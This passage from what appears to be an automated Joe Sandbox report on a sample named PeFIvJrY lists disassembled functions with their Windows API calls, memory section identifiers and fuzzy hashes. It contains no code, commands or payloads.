                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: PerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$CounterFrequencyXtime_get_ticks__alldvrm
                                • String ID:
                                • API String ID: 3602549092-0
                                • Opcode ID: 7f4b9ac62b1d4fd778bc626d927da10332adf2e2e2cab714ce044a1efce66e09
                                • Instruction ID: 1575caa44dfbcde1ab4f81f622ab3a3fe05af0a9068f22d523995759af3e3a07
                                • Opcode Fuzzy Hash: 7f4b9ac62b1d4fd778bc626d927da10332adf2e2e2cab714ce044a1efce66e09
                                • Instruction Fuzzy Hash: EA61B371E002589FDB19DFA8C881BBEBBB4EF49314F15416EF915AB381CA749C04CB68
                                Function 003F5A30 Relevance: 6.2, APIs: 4, Instructions: 174COMMON
                                Download Yara Rule
                                APIs
                                • __Mtx_unlock.LIBCPMT ref: 003F5AF7
                                • std::_Rethrow_future_exception.LIBCPMT ref: 003F5B44
                                • std::_Rethrow_future_exception.LIBCPMT ref: 003F5B54
                                • __Mtx_unlock.LIBCPMT ref: 003F5BF0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                • String ID:
                                • API String ID: 3298230783-0
                                • Opcode ID: fa0ad163e68bcdca41d19cc486d047bbcdb8a6d2e63044404cca1cfc4e26fccf
                                • Instruction ID: a393333e36e05a4f0feb7cf19f8874f4b41e4b4bb0696568e7f051a44d3da896
                                • Opcode Fuzzy Hash: fa0ad163e68bcdca41d19cc486d047bbcdb8a6d2e63044404cca1cfc4e26fccf
                                • Instruction Fuzzy Hash: 88515971D007489BDB12EBB5D806BBFBBF4EF45304F00052EE65293682EB78A944C7A1
                                Function 00427CBD Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                • Opcode ID: a87c4a583e402835d96f7710a16c683834cdecdb855d4d584e6a24edd489318c
                                • Instruction ID: b29c777e6eff1d30e0a062eb441ae0a313a886d53da8f0ee06b09d029998bd95
                                • Opcode Fuzzy Hash: a87c4a583e402835d96f7710a16c683834cdecdb855d4d584e6a24edd489318c
                                • Instruction Fuzzy Hash: CE5101727092269FDB298F25F841BBA77A5EF04304F94002FE90647391EB39AC41C7A9
                                Function 0043A248 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: EqualOffsetTypeids
                                • String ID:
                                • API String ID: 1707706676-0
                                • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                • Instruction ID: 94ae08841bebde4b5e2e6792a738c7077e03187209fc6524adda9d50b0f5bc17
                                • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                • Instruction Fuzzy Hash: AB51B93594420A8FDF10CFA9C4806AEBBF0EF59320F14548BEC91A7351D33AAD28CB56
                                Function 0041BFB0 Relevance: 6.1, APIs: 4, Instructions: 110memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C028
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                • Opcode ID: 0fbaaafb603b4b87ec813c55963fab5472bb23dc0b9b93b4e94ca07f37714a3c
                                • Instruction ID: 0c9aacf25bd8ebb3e7261d312913ec0572197d341b71f51e4d0704f3b227f0f9
                                • Opcode Fuzzy Hash: 0fbaaafb603b4b87ec813c55963fab5472bb23dc0b9b93b4e94ca07f37714a3c
                                • Instruction Fuzzy Hash: E4417CB1940209AFD710CFA9D845BDAFBF4FF08310F14822AE915A7780D7B99554CFA9
                                Function 003E4440 Relevance: 6.1, APIs: 4, Instructions: 103memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E4449
                                  • Part of subcall function 003E4360: GetCurrentThreadId.KERNEL32 ref: 003E43CB
                                • GetProcessHeap.KERNEL32(00000008,000000DC), ref: 003E44A1
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E44A8
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E44BF
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$CurrentProcessThread$Allocate
                                • String ID:
                                • API String ID: 1247256765-0
                                • Opcode ID: 9e89936626af3dd541a3faec504f5283bb3824afc0f31107f694a6f856a57c2b
                                • Instruction ID: 14ea289f45e6db5df5db2cbe9b3cf80052b1eb6f4e733d883ded945ee0f31edd
                                • Opcode Fuzzy Hash: 9e89936626af3dd541a3faec504f5283bb3824afc0f31107f694a6f856a57c2b
                                • Instruction Fuzzy Hash: 3831E135A002609BCB29CF66E88473AB7B5EF89301F16417ADD05DB2C1EB74DC50CBA4
                                Function 00425283 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • RtlAcquireSRWLockExclusive.NTDLL ref: 004252C8
                                • SleepConditionVariableSRW.KERNELBASE(00000000,?,A05DD77D,00000000), ref: 004252F9
                                • RtlReleaseSRWLockExclusive.NTDLL ref: 00425333
                                • RtlReleaseSRWLockExclusive.NTDLL ref: 0042535D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$AcquireConditionSleepVariable
                                • String ID:
                                • API String ID: 3114648011-0
                                • Opcode ID: 4beafa9d1075d008f88fc0061c140760ca2382f45dbcabc87e2715147f127e74
                                • Instruction ID: 7668ab1d88927a70f4769f161a2204851164b4834b1724e2bfdc475d241125d5
                                • Opcode Fuzzy Hash: 4beafa9d1075d008f88fc0061c140760ca2382f45dbcabc87e2715147f127e74
                                • Instruction Fuzzy Hash: 88315C75A0021ADFCB04CF68D985AAEBBF4FF09310F10852AE916E3391D735A911CFA4
                                Function 0041FC50 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID: 2.5.29.32
                                • API String ID: 4216857709-2506252730
                                • Opcode ID: 5298a67c4c264d6b6029e7f3ed27971ffb9650be0f828ca79a675ebb64653399
                                • Instruction ID: de2552ac727d3f1c3b05ff3b8700497ab1b224e0509adde79e0374da4edb32aa
                                • Opcode Fuzzy Hash: 5298a67c4c264d6b6029e7f3ed27971ffb9650be0f828ca79a675ebb64653399
                                • Instruction Fuzzy Hash: 8E118EB5A003099FDB10CFA8D844B9AFBF8FF09305F14806AED85E7340E77599448B94
                                Function 003EEEB0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003EEEEA
                                • VariantChangeType.OLEAUT32(00000000,?,00000000,00000003), ref: 003EEF12
                                • VariantClear.OLEAUT32(00000000), ref: 003EEF23
                                • _com_issue_error.COMSUPP ref: 003EEF46
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ChangeClearInitType_com_issue_error
                                • String ID:
                                • API String ID: 570206083-0
                                • Opcode ID: f34d09e6c6a0ef454409d4b4c5f4f8a6a873a5934713d215a07a9948cfe6cf49
                                • Instruction ID: aa8b8cf392f24d6af9c67a88587aa3b44fdd85ae9e3670563a7fd269918be16f
                                • Opcode Fuzzy Hash: f34d09e6c6a0ef454409d4b4c5f4f8a6a873a5934713d215a07a9948cfe6cf49
                                • Instruction Fuzzy Hash: 9411A031A04269DBCF11DFA5DC09BEEB7BCFB08710F11066AE902E3280E778A9008B54
                                Function 003F2530 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$ErrorLastShowUpdate
                                • String ID:
                                • API String ID: 2769001205-0
                                • Opcode ID: 6c08fd2fbf5f3b3470e5b5febfc64755f520fe5a30a012e2711230dd1605bbc7
                                • Instruction ID: 2e6ee2c08a7431872cb3ea1f59bfd04d1225dc2c99c04f209476f9baff0bd144
                                • Opcode Fuzzy Hash: 6c08fd2fbf5f3b3470e5b5febfc64755f520fe5a30a012e2711230dd1605bbc7
                                • Instruction Fuzzy Hash: 1A01D272645248DBE3726BA4BC0AB27B751A712716F940675EB08900E0FAF34DA1866E
                                Function 00437DC6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000), ref: 00437DDD
                                • GetLastError.KERNEL32(?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?,?,?,0043294F,?), ref: 00437DE9
                                  • Part of subcall function 00437DAF: CloseHandle.KERNEL32(FFFFFFFE,00437DF9,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?,?), ref: 00437DBF
                                • ___initconout.LIBCMT ref: 00437DF9
                                  • Part of subcall function 00437D71: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00437DA0,00436BD2,?,?,004323C8,?,?,00000000,?), ref: 00437D84
                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00436BE5,?,00000001,?,?,?,004323C8,?,?,00000000,?), ref: 00437E0E
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                • Opcode ID: 6f41ca575ebbc0f37ce503d9a99fce0f042069498429ea1683ebce02413858af
                                • Instruction ID: d1dcca09ea3b33ea4532fa679fe84f46d104658bda80c35c05a648c4724ff2f6
                                • Opcode Fuzzy Hash: 6f41ca575ebbc0f37ce503d9a99fce0f042069498429ea1683ebce02413858af
                                • Instruction Fuzzy Hash: 00F01C3A100218BBCF721FD1EC05E9A3F26FF497B0F004461FA2885130DA728830DB99
                                Function 00425DD1 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • SleepConditionVariableCS.KERNELBASE(?,00425D6E,00000064), ref: 00425DF4
                                • RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425DFE
                                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00425D6E,00000064,?,00409125,00468BFC,A05DD77D,00000000,?), ref: 00425E0F
                                • RtlEnterCriticalSection.NTDLL(00464694), ref: 00425E16
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                • String ID:
                                • API String ID: 3269011525-0
                                • Opcode ID: 5b6f7feb3a2770b7079edbfda892940791c2e0900bafd09ee450dcdeb4165623
                                • Instruction ID: 5f218fbe044ef3bf4b8548a1b86cf1d4dcd4fe1dda7ebbe2d7b1a83d50466b56
                                • Opcode Fuzzy Hash: 5b6f7feb3a2770b7079edbfda892940791c2e0900bafd09ee450dcdeb4165623
                                • Instruction Fuzzy Hash: 6BE01235641624ABCF122FD0FC09A8D3F29EB47761B114032FA0D56160DBFD19609BDE
                                Function 0040D440 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,0043C8A0,000000FF), ref: 0040D496
                                • SysFreeString.OLEAUT32(?), ref: 0040D569
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Free$LibraryString
                                • String ID: gfff
                                • API String ID: 428770685-1553575800
                                • Opcode ID: 422b31086294890f3330d076e3673641c30665e1fd36a114a6298cc095db284d
                                • Instruction ID: 999dafdbc9b66ccf45ebd82acad310b2128db207b5ca0630841afb0c4e336f40
                                • Opcode Fuzzy Hash: 422b31086294890f3330d076e3673641c30665e1fd36a114a6298cc095db284d
                                • Instruction Fuzzy Hash: 99819E71B00901ABE718CF68D998B6AB7A5FF45314F14422EE41AC7BD1D738F964CB88
                                Function 00401EF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: CORE$_TLD
                                • API String ID: 0-4220718512
                                • Opcode ID: 0db884ca6b767263217bdd117db14df29cb09713b69f50b7232d1e41b5a51789
                                • Instruction ID: 9b9e7369b871a37c63767e853005eebfbd6c44e38d9adecfb02f1afc81278296
                                • Opcode Fuzzy Hash: 0db884ca6b767263217bdd117db14df29cb09713b69f50b7232d1e41b5a51789
                                • Instruction Fuzzy Hash: DA6110B0A007049FE710CF68C944BABBBF4FB45314F10466EE415AB3D1D7B9A944CB95
                                Function 00404960 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 00404A46
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 00404B4F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 4194217158-3678301659
                                • Opcode ID: e26f91ea8d368bfb96eff37cd3a7f8bd5bb49fd3e7dd72df476a40dc411d105e
                                • Instruction ID: e09caddf4b03624cba7e680407ad7fc033cd1e27faf50173aa0e026cd2705051
                                • Opcode Fuzzy Hash: e26f91ea8d368bfb96eff37cd3a7f8bd5bb49fd3e7dd72df476a40dc411d105e
                                • Instruction Fuzzy Hash: B751D6B12106108FE7289B28DD8871BB7E1EF85314F544A2EE25AC7ED1D77CF9808B19
                                Function 003FC0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                Download Yara Rule
                                APIs
